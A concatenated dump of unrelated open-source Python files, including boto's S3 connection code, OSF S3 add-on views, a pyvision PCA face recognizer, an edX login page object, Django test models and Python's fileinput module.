url_base += self.build_host(server, bucket)
url_base += connection.get_path(self.build_path_base(bucket, key))
return url_base
class Location:
DEFAULT = '' # US Classic Region
EU = 'EU'
USWest = 'us-west-1'
APNortheast = 'ap-northeast-1'
APSoutheast = 'ap-southeast-1'
class S3Connection(AWSAuthConnection):
DefaultHost = 's3.amazonaws.com'
QueryString = 'Signature=%s&Expires=%d&AWSAccessKeyId=%s'
def __init__(self, aws_access_key_id=None, aws_secret_access_key=None,
is_secure=True, port=None, proxy=None, proxy_port=None,
proxy_user=None, proxy_pass=None,
host=DefaultHost, debug=0, https_connection_factory=None,
calling_format=SubdomainCallingFormat(), path='/', provider='aws',
bucket_class=Bucket):
self.calling_format = calling_format
self.bucket_class = bucket_class
AWSAuthConnection.__init__(self, host,
aws_access_key_id, aws_secret_access_key,
is_secure, port, proxy, proxy_port, proxy_user, proxy_pass,
debug=debug, https_connection_factory=https_connection_factory,
path=path, provider=provider)
def _required_auth_capability(self):
return ['s3']
def __iter__(self):
for bucket in self.get_all_buckets():
yield bucket
def __contains__(self, bucket_name):
return not (self.lookup(bucket_name) is None)
def set_bucket_class(self, bucket_class):
"""
Set the Bucket class associated with this bucket. By default, this
would be the boto.s3.key.Bucket class but if you want to subclass that
for some reason this allows you to associate your new class.
:type bucket_class: class
:param bucket_class: A subclass of Bucket that can be more specific
"""
self.bucket_class = bucket_class
def build_post_policy(self, expiration_time, conditions):
"""
Taken from the AWS book Python examples and modified for use with boto
"""
assert type(expiration_time) == time.struct_time, \
'Policy document must include a valid expiration Time object'
# Convert conditions object mappings to condition statements
return '{"expiration": "%s",\n"conditions": [%s]}' % \
(time.strftime(boto.utils.ISO8601, expiration_time), ",".join(conditions))
def build_post_form_args(self, bucket_name, key, expires_in = 6000,
acl = None, success_action_redirect = None, max_content_length = None,
http_method = "http", fields=None, conditions=None):
"""
Taken from the AWS book Python examples and modified for use with boto
This only returns the arguments required for the post form, not the actual form
This does not return the file input field which also needs to be added
:param bucket_name: Bucket to submit to
:type bucket_name: string
:param key: Key name, optionally add ${filename} to the end to attach the submitted filename
:type key: string
:param expires_in: Time (in seconds) before this expires, defaults to 6000
:type expires_in: integer
:param acl: ACL rule to use, if any
:type acl: :class:`boto.s3.acl.ACL`
:param success_action_redirect: URL to redirect to on success
:type success_action_redirect: string
:param max_content_length: Maximum size for this file
:type max_content_length: integer
:type http_method: string
:param http_method: HTTP Method to use, "http" or "https"
:rtype: dict
:return: A dictionary containing field names/values as well as a url to POST to
.. code-block:: python
{
"action": action_url_to_post_to,
"fields": [
{
"name": field_name,
"value": field_value
},
{
"name": field_name2,
"value": field_value2
}
]
}
"""
if fields == None:
fields = []
if conditions == None:
conditions = []
expiration = time.gmtime(int(time.time() + expires_in))
# Generate policy document
conditions.append('{"bucket": "%s"}' % bucket_name)
if key.endswith("${filename}"):
conditions.append('["starts-with", "$key", "%s"]' % key[:-len("${filename}")])
else:
conditions.append('{"key": "%s"}' % key)
if acl:
conditions.append('{"acl": "%s"}' % acl)
fields.append({ "name": "acl", "value": acl})
if success_action_redirect:
conditions.append('{"success_action_redirect": "%s"}' % success_action_redirect)
fields.append({ "name": "success_action_redirect", "value": success_action_redirect})
if max_content_length:
conditions.append('["content-length-range", 0, %i]' % max_content_length)
fields.append({"name":'content-length-range', "value": "0,%i" % max_content_length})
policy = self.build_post_policy(expiration, conditions)
# Add the base64-encoded policy document as the 'policy' field
policy_b64 = base64.b64encode(policy)
fields.append({"name": "policy", "value": policy_b64})
# Add the AWS access key as the 'AWSAccessKeyId' field
fields.append({"name": "AWSAccessKeyId", "value": self.aws_access_key_id})
# Add signature for encoded policy document as the 'AWSAccessKeyId' field
signature = self._auth_handler.sign_string(policy_b64)
fields.append({"name": "signature", "value": signature})
fields.append({"name": "key", "value": key})
# HTTPS protocol will be used if the secure HTTP option is enabled.
url = '%s://%s/' % (http_method, self.calling_format.build_host(self.server_name(), bucket_name))
return {"action": url, "fields": fields}
def generate_url(self, expires_in, method, bucket='', key='', headers=None,
query_auth=True, force_http=False, response_headers=None):
if not headers:
headers = {}
expires = int(time.time() + expires_in)
auth_path = self.calling_format.build_auth_path(bucket, key)
auth_path = self.get_path(auth_path)
# Arguments to override response headers become part of the canonical
# string to be signed.
if response_headers:
response_hdrs = ["%s=%s" % (k, v) for k, v in
response_headers.items()]
delimiter = '?' if '?' not in auth_path else '&'
auth_path = "%s%s%s" % (auth_path, delimiter, '&'.join(response_hdrs))
else:
response_headers = {}
c_string = boto.utils.canonical_string(method, auth_path, headers,
expires, self.provider)
b64_hmac = self._auth_handler.sign_string(c_string)
encoded_canonical = urllib.quote_plus(b64_hmac)
self.calling_format.build_path_base(bucket, key)
if query_auth:
query_part = '?' + self.QueryString % (encoded_canonical, expires,
self.aws_access_key_id)
# The response headers must also be GET parameters in the URL.
headers.update(response_headers)
hdrs = [ '%s=%s'%(name, urllib.quote(val)) for name,val in headers.items() ]
q_str = '&'.join(hdrs)
if q_str:
query_part += '&' + q_str
else:
query_part = ''
if force_http:
protocol = 'http'
port = 80
else:
protocol = self.protocol
port = self.port
return self.calling_format.build_url_base(self, protocol, self.server_name(port),
bucket, key) + query_part
def get_all_buckets(self, headers=None):
response = self.make_request('GET', headers=headers)
body = response.read()
if response.status > 300:
raise self.provider.storage_response_error(
response.status, response.reason, body)
rs = ResultSet([('Bucket', self.bucket_class)])
h = handler.XmlHandler(rs, self)
xml.sax.parseString(body, h)
return rs
def get_canonical_user_id(self, headers=None):
"""
Convenience method that returns the "CanonicalUserID" of the user who's credentials
are associated with the connection. The only way to get this value is to do a GET
request on the service which returns all buckets associated with the account. As part
of that response, the canonical userid is returned. This method simply does all of
that and then returns just the user id.
:rtype: string
:return: A string containing the canonical user id.
"""
rs = self.get_all_buckets(headers=headers)
return rs.ID
def get_bucket(self, bucket_name, validate=True, headers=None):
bucket = self.bucket_class(self, bucket_name)
if validate:
bucket.get_all_keys(headers, maxkeys=0)
return bucket
def lookup(self, bucket_name, validate=True, headers=None):
try:
bucket = self.get_bucket(bucket_name, validate, headers=headers)
except:
bucket = None
return bucket
def create_bucket(self, bucket_name, headers=None,
location=Location.DEFAULT, policy=None):
"""
Creates a new located bucket. By default it's in the USA. You can pass
Location.EU to create an European bucket.
:type bucket_name: string
:param bucket_name: The name of the new bucket
:type headers: dict
:param headers: Additional headers to pass along with the request to AWS.
:type location: :class:`boto.s3.connection.Location`
:param location: The location of the new bucket
:type policy: :class:`boto.s3.acl.CannedACLStrings`
:param policy: A canned ACL policy that will be applied to the new key in S3.
"""
check_lowercase_bucketname(bucket_name)
if policy:
if headers:
headers[self.provider.acl_header] = policy
else:
headers = {self.provider.acl_header : policy}
if location == Location.DEFAULT:
data = ''
else:
data = '<CreateBucketConstraint><LocationConstraint>' + \
location + '</LocationConstraint></CreateBucketConstraint>'
response = self.make_request('PUT', bucket_name, headers=headers,
data=data)
body = response.read()
if response.status == 409:
raise self.provider.storage_create_error(
response.status, response.reason, body)
if response.status == 200:
return self.bucket_class(self, bucket_name)
else:
raise self.provider.storage_response_error(
response.status, response.reason, body)
def delete_bucket(self, bucket, headers=None):
response = self.make_request('DELETE', bucket, headers=headers)
body = response.read()
if response.status != 204:
raise self.provider.storage_response_error(
response.status, response.reason, body)
def make_request(self, method, bucket='', key='', headers=None, data='',
query_args=None, sender=None, override_num_retries=None):
if isinstance(bucket, self.bucket_class):
bucket = bucket.name
if isinstance(key, Key):
key = key.name
path = self.calling_format.build_path_base(bucket, key)
boto.log.debug('path=%s' % path)
auth_path = self.calling_format.build_auth_path(bucket, key)
boto.log.debug('auth_path=%s' % auth_path)
host = self.calling_format.build_host(self.server_name(), bucket)
if query_args:
path += '?' + query_args
boto.log.debug('path=%s' % path)
auth_path += '?' + query_args
boto.log.debug('auth_path=%s' % auth_path)
return AWSAuthConnection.make_request(self, method, path, headers,
data, host, auth_path, sender,
override_num_retries=override_num_retries)
|
billyhunt/osf.io
|
refs/heads/develop
|
website/addons/s3/views/config.py
|
13
|
import httplib
from flask import request
from framework.exceptions import HTTPError
from framework.auth.decorators import must_be_logged_in
from website.addons.s3 import utils
from website.project.decorators import must_have_addon
from website.project.decorators import must_have_permission
from website.project.decorators import must_not_be_registration
@must_be_logged_in
def s3_post_user_settings(auth, **kwargs):
user_addon = auth.user.get_or_add_addon('s3')
try:
access_key = request.json['access_key']
secret_key = request.json['secret_key']
except KeyError:
raise HTTPError(httplib.BAD_REQUEST)
if not (access_key and secret_key):
return {
'message': ('All the fields above are required.')
}, httplib.BAD_REQUEST
if not utils.can_list(access_key, secret_key):
return {
'message': ('Unable to list buckets.\n'
'Listing buckets is required permission that can be changed via IAM')
}, httplib.BAD_REQUEST
user_addon.access_key = access_key
user_addon.secret_key = secret_key
user_addon.save()
@must_have_permission('write')
@must_have_addon('s3', 'node')
def s3_authorize_node(auth, node_addon, **kwargs):
try:
access_key = request.json['access_key']
secret_key = request.json['secret_key']
except KeyError:
raise HTTPError(httplib.BAD_REQUEST)
if not (access_key and secret_key):
return {
'message': 'All the fields above are required.'
}, httplib.BAD_REQUEST
if not utils.can_list(access_key, secret_key):
return {
'message': ('Unable to list buckets.\n'
'Listing buckets is required permission that can be changed via IAM')
}, httplib.BAD_REQUEST
user_addon = auth.user.get_or_add_addon('s3')
user_addon.access_key = access_key
user_addon.secret_key = secret_key
user_addon.save()
node_addon.authorize(user_addon, save=True)
return node_addon.to_json(auth.user)
@must_be_logged_in
@must_have_permission('write')
@must_have_addon('s3', 'node')
@must_have_addon('s3', 'user')
def s3_node_import_auth(auth, node_addon, user_addon, **kwargs):
node_addon.authorize(user_addon, save=True)
return node_addon.to_json(auth.user)
@must_have_permission('write')
@must_have_addon('s3', 'user')
@must_have_addon('s3', 'node')
@must_not_be_registration
def s3_post_node_settings(node, auth, user_addon, node_addon, **kwargs):
# Fail if user settings not authorized
if not user_addon.has_auth:
raise HTTPError(httplib.BAD_REQUEST)
# If authorized, only owner can change settings
if node_addon.has_auth and node_addon.user_settings.owner != auth.user:
raise HTTPError(httplib.BAD_REQUEST)
# Claiming the node settings
if not node_addon.user_settings:
node_addon.user_settings = user_addon
bucket = request.json.get('s3_bucket', '')
if not utils.bucket_exists(user_addon.access_key, user_addon.secret_key, bucket):
error_message = ('We are having trouble connecting to that bucket. '
'Try a different one.')
return {'message': error_message}, httplib.BAD_REQUEST
if bucket != node_addon.bucket:
# Update node settings
node_addon.bucket = bucket
node_addon.save()
node.add_log(
action='s3_bucket_linked',
params={
'node': node._id,
'project': node.parent_id,
'bucket': node_addon.bucket,
},
auth=auth,
)
return node_addon.to_json(auth.user)
@must_be_logged_in
@must_have_addon('s3', 'node')
@must_have_permission('write')
@must_not_be_registration
def s3_get_node_settings(auth, node_addon, **kwargs):
result = node_addon.to_json(auth.user)
result['urls'] = utils.serialize_urls(node_addon, auth.user)
return {'result': result}
@must_be_logged_in
@must_have_addon('s3', 'node')
@must_have_addon('s3', 'user')
@must_have_permission('write')
@must_not_be_registration
def s3_get_bucket_list(auth, node_addon, user_addon, **kwargs):
return {
'buckets': utils.get_bucket_names(user_addon)
}
@must_have_permission('write')
@must_have_addon('s3', 'node')
@must_not_be_registration
def s3_delete_node_settings(auth, node_addon, **kwargs):
node_addon.deauthorize(auth=auth, save=True)
return node_addon.to_json(auth.user)
@must_be_logged_in
@must_have_addon('s3', 'user')
def s3_delete_user_settings(user_addon, auth, **kwargs):
user_addon.revoke_auth(auth=auth, save=True)
user_addon.delete()
user_addon.save()
|
cosenal/waterbutler
|
refs/heads/develop
|
waterbutler/providers/box/settings.py
|
7
|
try:
from waterbutler import settings
except ImportError:
settings = {}
config = settings.get('BOX_PROVIDER_CONFIG', {})
BASE_URL = config.get('BASE_URL', 'https://api.box.com/2.0')
BASE_UPLOAD_URL = config.get('BASE_CONTENT_URL', 'https://upload.box.com/api/2.0')
|
mikeseven/pyvision
|
refs/heads/master
|
src/pyvision/face/PCA.py
|
3
|
# PyVision License
#
# Copyright (c) 2006-2008 David S. Bolme
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither name of copyright holders nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#import os.path
#from PIL.Image import ANTIALIAS
#import scipy as sp
import numpy as np
import os
import unittest
#from scipy.signal import fft2
from pyvision.face.FaceRecognizer import FaceRecognizer
from pyvision.analysis.FaceAnalysis import FaceRecognitionTest
import pyvision.vector.PCA
#from pyvision.other.normalize import *
#from pyvision.types.img import Image
#from pyvision.types.Point import Point
from pyvision.analysis.face import EyesFile
#from pyvision.analysis.roc import *
#from pyvision.types.Affine import *
import pyvision as pv
PCA_L1 = 1
PCA_L2 = 2
PCA_COS = 3
PCA_NO_NORM = 1
PCA_MEAN_STD_NORM = 2
PCA_MEAN_UNIT_NORM = 3
PCA_UNIT_NORM = 4
class PCA(FaceRecognizer):
''' This is a basic implementation of PCA'''
def __init__(self, face_size=(128,128), left_eye=pv.Point(32,52), right_eye=pv.Point(96,52), normalize=PCA_MEAN_STD_NORM, measure=PCA_COS, whiten=True, drop_front=2, basis_vectors=100):
'''Crate a PCA classifier'''
FaceRecognizer.__init__(self)
self.face_size = face_size
self.pca = pyvision.vector.PCA.PCA()
self.norm = normalize
self.trained = False
self.whiten = whiten
self.drop_front = drop_front
self.basis_vectors = basis_vectors
self.measure = measure
self.left_eye = left_eye
self.right_eye = right_eye
def cropFace(self,im,eyes):
left,right = eyes
affine = pv.AffineFromPoints(left,right,self.left_eye,self.right_eye,self.face_size)
im = affine.transformImage(im)
return im
#def addTraining(self,img,rect=None,eyes=None):
# ''' '''
# assert not self.trained
#
# img = self.cropFace(img,eyes)
# vec = self.computeVector(img)
# self.pca.addFeature(vec)
def computeFaceRecord(self,img,rect=None,eyes=None):
'''Given an image and face detection box, compute a face identification record'''
assert self.trained
img = self.cropFace(img,eyes)
vec = self.computeVector(img)
fir = self.pca.project(vec,whiten=True)
if self.measure == PCA_COS:
scale = np.sqrt((fir*fir).sum())
fir = (1.0/scale)*fir
return fir
def computeVector(self,img):
'''Creates a vector from a face'''
#face = img.asPIL().crop(rect.box()).resize(self.face_size,ANTIALIAS)
vec = img.asMatrix2D().flatten()
if self.norm == PCA_MEAN_STD_NORM:
vec = pv.meanStd(vec)
if self.norm == PCA_MEAN_UNIT_NORM:
vec = pv.meanUnit(vec)
if self.norm == PCA_UNIT_NORM:
vec = pv.unit(vec)
return vec
def train(self):
'''Train the PCA classifier'''
assert self.trained == False
for img,_,eyes,_ in self.training_data:
img = self.cropFace(img,eyes)
vec = self.computeVector(img)
self.pca.addFeature(vec)
self.pca.train( drop_front=self.drop_front, number=self.basis_vectors)
self.trained = True
def similarity(self,fir1,fir2):
'''Compute the similarity of two faces'''
assert self.trained == True
if self.measure == PCA_L1:
return (np.abs(fir1-fir2)).sum()
if self.measure == PCA_L2:
return np.sqrt(((fir1-fir2)*(fir1-fir2)).sum())
if self.measure == PCA_COS:
return (fir1*fir2).sum()
raise NotImplementedError("Unknown distance measure: %d"%self.measure)
def getBasis(self):
basis = self.pca.getBasis()
images = []
print basis.shape
r,_ = basis.shape
for i in range(r):
im = basis[i,:]
im = im.reshape(self.face_size)
im = pv.Image(im)
images.append(im)
print len(images)
return images
SCRAPS_FACE_DATA = os.path.join(pyvision.__path__[0],"data","csuScrapShots")
PCA_SIZE = (64,64)
class _TestFacePCA(unittest.TestCase):
def setUp(self):
self.images = []
self.names = []
self.eyes = EyesFile(os.path.join(SCRAPS_FACE_DATA,"coords.txt"))
for filename in self.eyes.files():
img = pv.Image(os.path.join(SCRAPS_FACE_DATA, filename + ".pgm"))
self.images.append(img)
self.names.append(filename)
self.assert_( len(self.images) == 173 )
def test_pca_scraps(self):
face_test = FaceRecognitionTest.FaceRecognitionTest(name='PCA_CSUScraps',score_type=FaceRecognitionTest.SCORE_TYPE_HIGH)
pca = PCA(drop_front=2,basis_vectors=55)
for im_name in self.eyes.files():
im = pv.Image(os.path.join(SCRAPS_FACE_DATA, im_name + ".pgm"))
rect = self.eyes.getFaces(im_name)
eyes = self.eyes.getEyes(im_name)
pca.addTraining(im,rect=rect[0],eyes=eyes[0])
pca.train()
face_records = {}
for im_name in self.eyes.files():
im = pv.Image(os.path.join(SCRAPS_FACE_DATA, im_name + ".pgm"))
rect = self.eyes.getFaces(im_name)
eyes = self.eyes.getEyes(im_name)
fr = pca.computeFaceRecord(im,rect=rect[0],eyes=eyes[0])
face_records[im_name] = fr
for i_name in face_records.keys():
scores = []
for j_name in face_records.keys():
similarity = pca.similarity(face_records[i_name],face_records[j_name])
scores.append((j_name,similarity))
face_test.addSample(i_name,scores)
#print face_test.rank1_bounds
self.assertAlmostEqual(face_test.rank1_rate,0.43930635838150289)
self.assertAlmostEqual(face_test.rank1_bounds[0],0.3640772723094895)
self.assertAlmostEqual(face_test.rank1_bounds[1],0.51665118592791259)
roc = face_test.getROCAnalysis()
# Test based of fpr=0.01
_ = roc.getFAR(far=0.01)
#TODO: does not work...
#self.assertAlmostEqual(1.0-roc_point.frr,0.16481069042316257)
# Test the equal error rate
#fp,tp,th = roc.findEqualError()
#self.assertAlmostEqual(tp,0.68819599109131402)
|
Livit/Livit.Learn.EdX
|
refs/heads/labster/develop
|
common/test/acceptance/pages/lms/login.py
|
205
|
"""
Login page for the LMS.
"""
from bok_choy.page_object import PageObject
from bok_choy.promise import EmptyPromise
from . import BASE_URL
from .dashboard import DashboardPage
class LoginPage(PageObject):
"""
Login page for the LMS.
"""
url = BASE_URL + "/login"
def is_browser_on_page(self):
return any([
'log in' in title.lower()
for title in self.q(css='span.title-super').text
])
def login(self, email, password):
"""
Attempt to log in using `email` and `password`.
"""
self.provide_info(email, password)
self.submit()
def provide_info(self, email, password):
"""
Fill in login info.
`email` and `password` are the user's credentials.
"""
EmptyPromise(self.q(css='input#email').is_present, "Click ready").fulfill()
EmptyPromise(self.q(css='input#password').is_present, "Click ready").fulfill()
self.q(css='input#email').fill(email)
self.q(css='input#password').fill(password)
self.wait_for_ajax()
def submit(self):
"""
Submit registration info to create an account.
"""
self.q(css='button#submit').first.click()
# The next page is the dashboard; make sure it loads
dashboard = DashboardPage(self.browser)
dashboard.wait_for_page()
return dashboard
|
campbe13/openhatch
|
refs/heads/master
|
vendor/packages/Django/tests/regressiontests/generic_views/models.py
|
111
|
from django.core.urlresolvers import reverse
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class Artist(models.Model):
name = models.CharField(max_length=100)
class Meta:
ordering = ['name']
verbose_name = 'professional artist'
verbose_name_plural = 'professional artists'
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('artist_detail', kwargs={'pk': self.id})
@python_2_unicode_compatible
class Author(models.Model):
name = models.CharField(max_length=100)
slug = models.SlugField()
class Meta:
ordering = ['name']
def __str__(self):
return self.name
@python_2_unicode_compatible
class Book(models.Model):
name = models.CharField(max_length=300)
slug = models.SlugField()
pages = models.IntegerField()
authors = models.ManyToManyField(Author)
pubdate = models.DateField()
class Meta:
ordering = ['-pubdate']
def __str__(self):
return self.name
class Page(models.Model):
content = models.TextField()
template = models.CharField(max_length=300)
class BookSigning(models.Model):
event_date = models.DateTimeField()
|
flyfei/python-for-android
|
refs/heads/master
|
python3-alpha/python3-src/Lib/fileinput.py
|
46
|
"""Helper class to quickly write a loop over all standard input files.
Typical use is:
import fileinput
for line in fileinput.input():
process(line)
This iterates over the lines of all files listed in sys.argv[1:],
defaulting to sys.stdin if the list is empty. If a filename is '-' it
is also replaced by sys.stdin. To specify an alternative list of
filenames, pass it as the argument to input(). A single file name is
also allowed.
Functions filename(), lineno() return the filename and cumulative line
number of the line that has just been read; filelineno() returns its
line number in the current file; isfirstline() returns true iff the
line just read is the first line of its file; isstdin() returns true
iff the line was read from sys.stdin. Function nextfile() closes the
current file so that the next iteration will read the first line from
the next file (if any); lines not read from the file will not count
towards the cumulative line count; the filename is not changed until
after the first line of the next file has been read. Function close()
closes the sequence.
Before any lines have been read, filename() returns None and both line
numbers are zero; nextfile() has no effect. After all lines have been
read, filename() and the line number functions return the values
pertaining to the last line read; nextfile() has no effect.
All files are opened in text mode by default, you can override this by
setting the mode parameter to input() or FileInput.__init__().
If an I/O error occurs during opening or reading a file, the IOError
exception is raised.
If sys.stdin is used more than once, the second and further use will
return no lines, except perhaps for interactive use, or if it has been
explicitly reset (e.g. using sys.stdin.seek(0)).
Empty files are opened and immediately closed; the only time their
presence in the list of filenames is noticeable at all is when the
last file opened is empty.
It is possible that the last line of a file doesn't end in a newline
character; otherwise lines are returned including the trailing
newline.
Class FileInput is the implementation; its methods filename(),
lineno(), fileline(), isfirstline(), isstdin(), nextfile() and close()
correspond to the functions in the module. In addition it has a
readline() method which returns the next input line, and a
__getitem__() method which implements the sequence behavior. The
sequence must be accessed in strictly sequential order; sequence
access and readline() cannot be mixed.
Optional in-place filtering: if the keyword argument inplace=1 is
passed to input() or to the FileInput constructor, the file is moved
to a backup file and standard output is directed to the input file.
This makes it possible to write a filter that rewrites its input file
in place. If the keyword argument backup=".<some extension>" is also
given, it specifies the extension for the backup file, and the backup
file remains around; by default, the extension is ".bak" and it is
deleted when the output file is closed. In-place filtering is
disabled when standard input is read. XXX The current implementation
does not work for MS-DOS 8+3 filesystems.
Performance: this module is unfortunately one of the slower ways of
processing large numbers of input lines. Nevertheless, a significant
speed-up has been obtained by using readlines(bufsize) instead of
readline(). A new keyword argument, bufsize=N, is present on the
input() function and the FileInput() class to override the default
buffer size.
XXX Possible additions:
- optional getopt argument processing
- isatty()
- read(), read(size), even readlines()
"""
import sys, os
__all__ = ["input", "close", "nextfile", "filename", "lineno", "filelineno",
"isfirstline", "isstdin", "FileInput"]
_state = None
DEFAULT_BUFSIZE = 8*1024
def input(files=None, inplace=False, backup="", bufsize=0,
mode="r", openhook=None):
"""input(files=None, inplace=False, backup="", bufsize=0, \
mode="r", openhook=None)
Create an instance of the FileInput class. The instance will be used
as global state for the functions of this module, and is also returned
to use during iteration. The parameters to this function will be passed
along to the constructor of the FileInput class.
"""
global _state
if _state and _state._file:
raise RuntimeError("input() already active")
_state = FileInput(files, inplace, backup, bufsize, mode, openhook)
return _state
def close():
"""Close the sequence."""
global _state
state = _state
_state = None
if state:
state.close()
def nextfile():
"""
Close the current file so that the next iteration will read the first
line from the next file (if any); lines not read from the file will
not count towards the cumulative line count. The filename is not
changed until after the first line of the next file has been read.
Before the first line has been read, this function has no effect;
it cannot be used to skip the first file. After the last line of the
last file has been read, this function has no effect.
"""
if not _state:
raise RuntimeError("no active input()")
return _state.nextfile()
def filename():
"""
Return the name of the file currently being read.
Before the first line has been read, returns None.
"""
if not _state:
raise RuntimeError("no active input()")
return _state.filename()
def lineno():
"""
Return the cumulative line number of the line that has just been read.
Before the first line has been read, returns 0. After the last line
of the last file has been read, returns the line number of that line.
"""
if not _state:
raise RuntimeError("no active input()")
return _state.lineno()
def filelineno():
"""
Return the line number in the current file. Before the first line
has been read, returns 0. After the last line of the last file has
been read, returns the line number of that line within the file.
"""
if not _state:
raise RuntimeError("no active input()")
return _state.filelineno()
def fileno():
"""
Return the file number of the current file. When no file is currently
opened, returns -1.
"""
if not _state:
raise RuntimeError("no active input()")
return _state.fileno()
def isfirstline():
"""
Returns true the line just read is the first line of its file,
otherwise returns false.
"""
if not _state:
raise RuntimeError("no active input()")
return _state.isfirstline()
def isstdin():
"""
Returns true if the last line was read from sys.stdin,
otherwise returns false.
"""
if not _state:
raise RuntimeError("no active input()")
return _state.isstdin()
class FileInput:
"""class FileInput([files[, inplace[, backup[, mode[, openhook]]]]])
Class FileInput is the implementation of the module; its methods
filename(), lineno(), fileline(), isfirstline(), isstdin(), fileno(),
nextfile() and close() correspond to the functions of the same name
in the module.
In addition it has a readline() method which returns the next
input line, and a __getitem__() method which implements the
sequence behavior. The sequence must be accessed in strictly
sequential order; random access and readline() cannot be mixed.
"""
def __init__(self, files=None, inplace=False, backup="", bufsize=0,
mode="r", openhook=None):
if isinstance(files, str):
files = (files,)
else:
if files is None:
files = sys.argv[1:]
if not files:
files = ('-',)
else:
files = tuple(files)
self._files = files
self._inplace = inplace
self._backup = backup
self._bufsize = bufsize or DEFAULT_BUFSIZE
self._savestdout = None
self._output = None
self._filename = None
self._lineno = 0
self._filelineno = 0
self._file = None
self._isstdin = False
self._backupfilename = None
self._buffer = []
self._bufindex = 0
# restrict mode argument to reading modes
if mode not in ('r', 'rU', 'U', 'rb'):
raise ValueError("FileInput opening mode must be one of "
"'r', 'rU', 'U' and 'rb'")
self._mode = mode
if inplace and openhook:
raise ValueError("FileInput cannot use an opening hook in inplace mode")
elif openhook and not hasattr(openhook, '__call__'):
raise ValueError("FileInput openhook must be callable")
self._openhook = openhook
def __del__(self):
self.close()
def close(self):
self.nextfile()
self._files = ()
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def __iter__(self):
return self
def __next__(self):
try:
line = self._buffer[self._bufindex]
except IndexError:
pass
else:
self._bufindex += 1
self._lineno += 1
self._filelineno += 1
return line
line = self.readline()
if not line:
raise StopIteration
return line
def __getitem__(self, i):
if i != self._lineno:
raise RuntimeError("accessing lines out of order")
try:
return self.__next__()
except StopIteration:
raise IndexError("end of input reached")
def nextfile(self):
savestdout = self._savestdout
self._savestdout = 0
if savestdout:
sys.stdout = savestdout
output = self._output
self._output = 0
if output:
output.close()
file = self._file
self._file = 0
if file and not self._isstdin:
file.close()
backupfilename = self._backupfilename
self._backupfilename = 0
if backupfilename and not self._backup:
try: os.unlink(backupfilename)
except OSError: pass
self._isstdin = False
self._buffer = []
self._bufindex = 0
def readline(self):
try:
line = self._buffer[self._bufindex]
except IndexError:
pass
else:
self._bufindex += 1
self._lineno += 1
self._filelineno += 1
return line
if not self._file:
if not self._files:
return ""
self._filename = self._files[0]
self._files = self._files[1:]
self._filelineno = 0
self._file = None
self._isstdin = False
self._backupfilename = 0
if self._filename == '-':
self._filename = '<stdin>'
self._file = sys.stdin
self._isstdin = True
else:
if self._inplace:
self._backupfilename = (
self._filename + (self._backup or ".bak"))
try: os.unlink(self._backupfilename)
except os.error: pass
# The next few lines may raise IOError
os.rename(self._filename, self._backupfilename)
self._file = open(self._backupfilename, self._mode)
try:
perm = os.fstat(self._file.fileno()).st_mode
except OSError:
self._output = open(self._filename, "w")
else:
mode = os.O_CREAT | os.O_WRONLY | os.O_TRUNC
if hasattr(os, 'O_BINARY'):
mode |= os.O_BINARY
fd = os.open(self._filename, mode, perm)
self._output = os.fdopen(fd, "w")
try:
if hasattr(os, 'chmod'):
os.chmod(self._filename, perm)
except OSError:
pass
self._savestdout = sys.stdout
sys.stdout = self._output
else:
# This may raise IOError
if self._openhook:
self._file = self._openhook(self._filename, self._mode)
else:
self._file = open(self._filename, self._mode)
self._buffer = self._file.readlines(self._bufsize)
self._bufindex = 0
if not self._buffer:
self.nextfile()
# Recursive call
return self.readline()
def filename(self):
return self._filename
def lineno(self):
return self._lineno
def filelineno(self):
return self._filelineno
def fileno(self):
if self._file:
try:
return self._file.fileno()
except ValueError:
return -1
else:
return -1
def isfirstline(self):
return self._filelineno == 1
def isstdin(self):
return self._isstdin
def hook_compressed(filename, mode):
ext = os.path.splitext(filename)[1]
if ext == '.gz':
import gzip
return gzip.open(filename, mode)
elif ext == '.bz2':
import bz2
return bz2.BZ2File(filename, mode)
else:
return open(filename, mode)
def hook_encoded(encoding):
import codecs
def openhook(filename, mode):
return codecs.open(filename, mode, encoding)
return openhook
def _test():
import getopt
inplace = False
backup = False
opts, args = getopt.getopt(sys.argv[1:], "ib:")
for o, a in opts:
if o == '-i': inplace = True
if o == '-b': backup = a
for line in input(args, inplace=inplace, backup=backup):
if line[-1:] == '\n': line = line[:-1]
if line[-1:] == '\r': line = line[:-1]
print("%d: %s[%d]%s %s" % (lineno(), filename(), filelineno(),
isfirstline() and "*" or "", line))
print("%d: %s[%d]" % (lineno(), filename(), filelineno()))
if __name__ == '__main__':
_test()
|
dav1x/ansible
|
refs/heads/devel
|
test/units/modules/network/iosxr/iosxr_module.py
|
58
|
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
